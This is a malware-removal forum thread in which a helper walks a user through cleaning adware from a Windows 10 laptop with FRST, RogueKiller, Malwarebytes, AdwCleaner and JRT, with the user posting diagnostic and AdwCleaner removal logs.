Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.641
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.451
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:21.602
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:21.574
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:21.526
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:20.862
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: AMD A6-4400M APU with Radeon(tm) HD Graphics
Percentage of memory in use: 68%
Total physical RAM: 3561.36 MB
Available physical RAM: 1133.93 MB
Total Virtual: 7145.36 MB
Available Virtual: 4381.24 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:445.3 GB) (Free:394.77 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery) (Fixed) (Total:20.16 GB) (Free:2.14 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (86489) (CDROM) (Total:7.39 GB) (Free:0 GB) UDF

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 915B52F3)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=445.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=20.2 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End of Addition.txt ============================

 

[Broni]

Please, observe following rules:

• Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
• If you're stuck, or you're not sure about certain step, always ask before doing anything else.
• Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
• Never run more than one scan at a time.
• Keep updating me regarding your computer behavior, good, or bad.
• The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
• If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
• I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

===========================================

Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

When done with the above uninstall following unwanted programs:

Download Updater
FromDocToPDF Internet Explorer Homepage and New Tab
Itibiti RTC
NowUSeeIt Player
RegCure Pro

Next....

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2

• Close all the running programs
• Double click on downloaded setup.exe file to install the program.
• Click on Start Scan button.
• Click on another Start Scan button.
• Wait until the Status box shows Scan Finished
• Click on Delete.
• Wait until the Status box shows Deleting Finished.
• Click on Report and copy/paste the content of the Notepad into your next reply.
• RKreport.txt could also be found on your desktop.
• If more than one log is produced post all logs.

Please download Malwarebytes to your desktop.

• Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
• Then click Finish.
• Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
• If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
• When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
• Restart your computer when prompted to do so.
• The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.

Please download AdwCleaner by Xplode and save to your Desktop.

• Double click on AdwCleaner.exe to run the tool.
  Vista/Windows 7/8 users right-click and select Run As Administrator
• The tool will start to update the database if one is required.
• Click on the Scan button.
• AdwCleaner will begin...be patient as the scan may take some time to complete.
• After the scan has finished, click on the Logfile button.
• A window will open which lists the logs of your scans.
• Click on the Scan tab.
• Double-click the most recent scan which will be at the top of the list....the log will appear.
• Review the results...see note below
• After reviewing the log, click on the Clean button.
• Press OK when asked to close all programs and follow the onscreen prompts.
• Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
• After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
• To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
• Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
• A copy of all logfiles are saved to C:\AdwCleaner.

-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.

Please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
• The tool will open and start scanning your system.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Post the contents of JRT.txt into your next message.

 

[glhglh]

fixlistlog:

Fix result of Farbar Recovery Scan Tool (x64) Version: 10-02-2017
Ran by Randy (11-02-2017 14:40:32) Run:1
Running from C:\Users\Randy\Desktop\Virus
Loaded Profiles: Randy (Available Profiles: Randy & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden <==== ATTENTION
*****************

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{730E03E4-350E-48E5-9D3E-4329903D454D}\\SystemComponent => value removed successfully

==== End of Fixlog 14:40:32 ====

 

[glhglh]

Is it ok to reboot as asked by Nowuseeit?

 

[Broni]

Yes.

 

[glhglh]

Problem with installing RogueKiller: Setup was unable to create the directory c:\rANDY\APPDATA\LOCAL\TEMP\IS-7ALMS.tmp
Error 5: Access is denied.

Move on to Malware?

 

[Broni]

Take ownership of rANDY directory and try again: http://www.howtogeek.com/howto/wind...ership-to-explorer-right-click-menu-in-vista/

 

[glhglh]

Took control of Randy directory, but still same error message

 

[Broni]

Go ahead with MBAM.

 

[glhglh]

Similar problem:
Problem with installing RogueKiller: Setup was unable to create the directory c:\rANDY\APPDATA\LOCAL\TEMP\IS-EVF9C.tmp
Error 5: Access is denied.
Now what. after working with you for 10 years, this is the first time I've had this problem. I've told my brother in law over and over not to load any program or thing when it pops up. no clicking update drivers, yet this. Thanks for the help.

 

[Broni]

Go ahead with other scans

 

[glhglh]

Made some progress with adaware:

# AdwCleaner v6.043 - Logfile created 11/02/2017 at 18:11:15
# Updated on 27/01/2017 by Malwarebytes
# Database : 2017-02-09.1 [Local]
# Operating System : Windows 10 Home (X64)
# Username : Randy - HP-RRR
# Running from : C:\Users\Randy\Favorites\Downloads\AdwCleaner.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****

[-] Service deleted: sbmntr
[-] Service deleted: swdumon
[-] Service deleted: SlimService


***** [ Folders ] *****

[-] Folder deleted: C:\ProgramData\261dc3b1
[-] Folder deleted: C:\ProgramData\36f86f45-1b77-1
[-] Folder deleted: C:\ProgramData\36f86f45-7e55-0
[-] Folder deleted: C:\ProgramData\ee6dbd75-5221-0
[-] Folder deleted: C:\ProgramData\ee6dbd75-5bb7-0
[-] Folder deleted: C:\ProgramData\ee6dbd75-5bc1-0
[-] Folder deleted: C:\ProgramData\ee6dbd75-63b7-1
[-] Folder deleted: C:\ProgramData\f80ff131-0b33-1
[-] Folder deleted: C:\ProgramData\f80ff131-23f3-0
[-] Folder deleted: C:\ProgramData\Service1291
[-] Folder deleted: C:\ProgramData\{00f0021e-112c-1}
[-] Folder deleted: C:\ProgramData\{01fe41a9-412c-0}
[-] Folder deleted: C:\ProgramData\{0ccc5bd4-712c-1}
[-] Folder deleted: C:\ProgramData\{0d6ade3e-112c-1}
[-] Folder deleted: C:\ProgramData\{18e52712-012c-0}
[-] Folder deleted: C:\ProgramData\{2ed2530e-412c-0}
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate
[-] Folder deleted: C:\Program Files (x86)\DriverUpdate
[-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}
[-] Folder deleted: C:\WINDOWS\Installer\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}
[-] Folder deleted: C:\Users\Randy\AppData\Local\BrowserHelper
[-] Folder deleted: C:\Users\Randy\AppData\Local\globalUpdate
[-] Folder deleted: C:\Users\Randy\AppData\Local\Professional_Cleaning_Sof
[-] Folder deleted: C:\Users\Randy\AppData\Local\slimware utilities inc
[-] Folder deleted: C:\Users\Randy\AppData\Local\TNT2
[-] Folder deleted: C:\Users\Randy\AppData\Local\TVTime
[-] Folder deleted: C:\Users\Randy\AppData\Local\Downloaded Installers
[-] Folder deleted: C:\Users\Randy\AppData\Local\NowUSeeItPlayer
[-] Folder deleted: C:\Users\Randy\AppData\Local\SlimWare Utilities Inc
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\ParetoLogic
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Store
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\WTools
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\TelevisionFanatic
[#] Folder deleted on reboot: C:\Users\Randy\AppData\Roaming\PARETOLOGIC
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Driver Detective
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
[-] Folder deleted: C:\Users\Randy\Documents\ProfessionalCleaningSoftware
[-] Folder deleted: C:\Program Files\Earth Networks
[-] Folder deleted: C:\Program Files\slimcleaner plus
[-] Folder deleted: C:\Program Files\slimservice
[-] Folder deleted: C:\Program Files\TotalSystemCare
[#] Folder deleted on reboot: C:\Program Files\SlimCleaner Plus
[#] Folder deleted on reboot: C:\Program Files\SlimService
[-] Folder deleted: C:\ProgramData\ByteFence
[-] Folder deleted: C:\ProgramData\ParetoLogic
[-] Folder deleted: C:\ProgramData\slimware utilities inc
[-] Folder deleted: C:\ProgramData\speedypc software
[-] Folder deleted: C:\ProgramData\Viewpoint
[#] Folder deleted on reboot: C:\ProgramData\SpeedyPC Software
[#] Folder deleted on reboot: C:\ProgramData\SlimWare Utilities Inc
[#] Folder deleted on reboot: C:\ProgramData\PARETOLOGIC
[#] Folder deleted on reboot: C:\ProgramData\Application Data\ByteFence
[#] Folder deleted on reboot: C:\ProgramData\Application Data\ParetoLogic
[#] Folder deleted on reboot: C:\ProgramData\Application Data\slimware utilities inc
[#] Folder deleted on reboot: C:\ProgramData\Application Data\speedypc software
[#] Folder deleted on reboot: C:\ProgramData\Application Data\Viewpoint
[#] Folder deleted on reboot: C:\ProgramData\Application Data\SpeedyPC Software
[#] Folder deleted on reboot: C:\ProgramData\Application Data\SlimWare Utilities Inc
[#] Folder deleted on reboot: C:\ProgramData\Application Data\PARETOLOGIC
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverRestore
[#] Folder deleted on reboot: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\driverupdate
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\slimcleaner plus
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\speedypc software
[#] Folder deleted on reboot: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpeedyPC Software
[#] Folder deleted on reboot: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SlimCleaner Plus
[#] Folder deleted on reboot: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverUpdate
[-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers
[-] Folder deleted: C:\Program Files (x86)\Driver Detective
[-] Folder deleted: C:\Program Files (x86)\DriverRestore
[#] Folder deleted on reboot: C:\Program Files (x86)\driverupdate
[-] Folder deleted: C:\Program Files (x86)\globalUpdate
[-] Folder deleted: C:\Program Files (x86)\jZip
[#] Folder deleted on reboot: C:\Program Files (x86)\speedypc software
[-] Folder deleted: C:\Program Files (x86)\Viewpoint
[-] Folder deleted: C:\Program Files (x86)\YTDownloader
[-] Folder deleted: C:\Program Files (x86)\NowUSeeItPlayer
[#] Folder deleted on reboot: C:\Program Files (x86)\SpeedyPC Software
[-] Folder deleted: C:\Program Files (x86)\PRO PC Cleaner
[#] Folder deleted on reboot: C:\Program Files (x86)\DriverUpdate
[-] Folder deleted: C:\Program Files (x86)\iolo\System Checkup
[-] Folder deleted: C:\Program Files (x86)\Common Files\speedypc software
[#] Folder deleted on reboot: C:\Program Files (x86)\Common Files\SpeedyPC Software
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\updates
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\staged\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
[-] Folder deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\videoresumer@jetpack
[-] Folder deleted: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\kofkpgiaknijknhajbhnghkodiccblkg


***** [ Files ] *****

[-] File deleted: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jZip.lnk
[-] File deleted: C:\Users\Randy\Desktop\YTDownloader.lnk
[-] File deleted: C:\WINDOWS\SysNative\drivers\swdumon.sys
[-] File deleted: C:\END
[-] File deleted: C:\Users\Public\Desktop\DriverRestore.lnk
[-] File deleted: C:\Users\Public\Desktop\slimcleaner plus.lnk
[-] File deleted: C:\Users\Public\Desktop\driverupdate.lnk
[#] File deleted: C:\Users\Public\Desktop\SlimCleaner Plus.lnk
[-] File deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.html.lnk
[-] File deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\staged\{635abd67-4fe9-1b23-4f01-e679fa7484c1}.json
[-] File deleted: C:\Program Files (x86)\Mozilla Firefox\cfg
[-] File deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\searchplugins\Search Provided by Yahoo.xml
[#] File deleted: C:\Program Files (x86)\Mozilla Firefox\cfg
[#] File deleted: C:\Program Files (x86)\Mozilla Firefox\cfg
[-] File deleted: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kofkpgiaknijknhajbhnghkodiccblkg_0.localstorage


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****

[-] Task deleted: CRWKRUVUBYBCAXNB
[-] Task deleted: Nubopo
[-] Task deleted: SlimCleaner Plus (Scheduled Scan - Randy)
[-] Task deleted: {090C7947-7904-0E0F-0A11-0B7E7F79117F}
[-] Task deleted: CRWKRUVUBYBCAXNB
[-] Task deleted: DriverRestore_DailyScan
[-] Task deleted: DriverRestore_ScheduledScan
[-] Task deleted: SpeedyPC Update Version3
[-] Task deleted: YTDownloader
[-] Task deleted: YTDownloaderUpd
[-] Task deleted: LaunchPreSignup
[-] Task deleted: ProfessionalCleaningSoftware_Start
[-] Task deleted: DriverUpdate Scan
[-] Task deleted: DriverUpdate Startup


***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate_is1
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75881A1F-A02E-4D88-BCFA-34D86752A0C3}_is1
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\NETTCPHANDLER
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\NETTCPHANDLER
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\sys_service
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\sys_service
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.CookiesManager
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.CookiesManager.1
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.hxxpHandle302
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.hxxpHandle302.1
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.PostUrlWorker
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\ShopAtHomeHelper.PostUrlWorker.1
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.CookiesManager
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.CookiesManager.1
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.hxxpHandle302
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.hxxpHandle302.1
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.PostUrlWorker
[#] Key deleted on reboot: HKCU\Software\Classes\ShopAtHomeHelper.PostUrlWorker.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
[-] Key deleted: HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl
[-] Key deleted: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary
[-] Key deleted: HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary.1
[-] Key deleted: HKLM\SOFTWARE\Classes\CRSBRWSHTML
[-] Key deleted: HKLM\SOFTWARE\Classes\uus3url-spc
[-] Key deleted: HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
[-] Key deleted: HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.CookiesManager
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.CookiesManager.1
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.hxxpHandle302
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.hxxpHandle302.1
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.PostUrlWorker
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\ShopAtHomeHelper.PostUrlWorker.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtl.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\AxMetaStream.MetaStreamCtlSecondary.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\CRSBRWSHTML
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\uus3url-spc
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\YBrowserToolbar.YBrowserToolbar.1
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Classes\TypeLib\{B944FF5E-EC87-4E1E-8C49-2FF3BC573997}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{7375D127-3955-4654-8E7D-1949A7A9C902}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{1BD47D21-01F4-4538-9290-39FD569A0F24}
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{149622B2-F1C5-492D-BFDF-8E5ED85854A0}
[-] Key deleted: HKCU\Software\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
[-] Key deleted: HKCU\Software\Classes\CLSID\{08613A51-6E3E-43CC-9ECF-DD58B5837341}
[-] Key deleted: HKCU\Software\Classes\CLSID\{153EDC41-A2CC-4BEB-9EC8-008242389E50}
[-] Key deleted: HKCU\Software\Classes\CLSID\{188028B8-D91D-4BE2-BABA-68E32BDE4420}
[-] Key deleted: HKCU\Software\Classes\CLSID\{28E74F15-18C2-465E-B545-6CC738121C68}
[-] Key deleted: HKCU\Software\Classes\CLSID\{2BF6042B-B9B1-46D9-A3F8-9C987FADD4C6}
[-] Key deleted: HKCU\Software\Classes\CLSID\{40A222E2-93B1-45F9-9B07-0D1160A31A6C}
[-] Key deleted: HKCU\Software\Classes\CLSID\{6325A84C-E746-4007-A9C5-E4C1A50ED61F}
[-] Key deleted: HKCU\Software\Classes\CLSID\{9BCA87A0-5B8F-4500-A5AF-EA1279714FDF}
[-] Key deleted: HKCU\Software\Classes\CLSID\{BB17DE65-B548-48C2-AC73-1FD1996C7261}
[-] Key deleted: HKCU\Software\Classes\CLSID\{C77D3EEF-FDCA-4D37-B0D2-5FF650E07825}
[-] Key deleted: HKCU\Software\Classes\CLSID\{EA70EB31-CBAD-4862-AFDA-DCFCC32722ED}
[-] Key deleted: HKCU\Software\Classes\CLSID\{EC9100F8-5918-4F1B-9CC1-4D34A64E0FE0}
[-] Key deleted: HKCU\Software\Classes\CLSID\{F1A1ABE3-F454-4DD9-B520-01F2EEC5F0DD}
[-] Key deleted: HKCU\Software\Classes\CLSID\{17EF1FFB-0545-4C9A-BE64-78FF53338475}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{03F998B2-0E00-11D3-A498-00104B6EB52E}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{F56ACA29-1C99-40F1-AC64-2E44C4F6BC71}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{12D3E096-0FDF-42CC-8F44-04944F9C1648}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{22389F39-2CF4-47C4-B8B2-273BB16BF70C}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{23E3CEB3-D63A-433E-A5D0-4DB1C501B915}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{26A3152F-CF87-4C5B-8093-4D4B9EC084EB}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{29E3319C-4B3C-479F-8692-BDD2CA30BEDD}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{367BD1CD-74A3-451F-B1A4-6A2DE4129A2D}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{49F018EE-F362-4B5B-8EC8-BCF9246ABF21}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{63B73044-FC1A-4FE1-991B-FDBD4CDAA868}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{7207E52B-821E-4C05-A8D6-2965B2BE77CF}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{863FCF5D-DC39-4DA9-AF32-CB0025990EEE}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{B09E015A-4D4E-4F8D-A436-95E19140947D}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{B1E712C4-03AA-495F-B0F5-0F057E126E2A}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{D13DC65C-C77B-4986-9078-DEA3D34C71BB}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{371AD4A5-1520-4AA2-A8A4-F9AD3BAC6957}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{7F124846-5453-4BB8-A41D-E11481FFC9DF}
[-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{8FD65019-BF09-45DA-AD81-E95AE911F1FD}
[#] Key deleted on reboot: HKCU\Software\Classes\TypeLib\{B944FF5E-EC87-4E1E-8C49-2FF3BC573997}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{A5FF3EB5-BF62-4D59-84DF-DC518E46FCB3}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{38122A36-83B2-46B8-B39A-EC72A4614A07}
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{79F768ED-0B12-42EF-8257-36751A0ECF3A}]
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\DAILYPCCLEAN
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\DriverRestore
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\eSupport.com
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\GlobalUpdate
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Tinstalls
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\ParetoLogic
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\powerpack
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\PRODUCTSETUP
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\ProfessionalCleaningSoftwareLanguage
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\SlimWare Utilities Inc
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\speedypc software
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Store
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\TNT2
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\tstamptoken
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\WTools
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Yahoo\Companion
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Yahoo\YFriendsBar
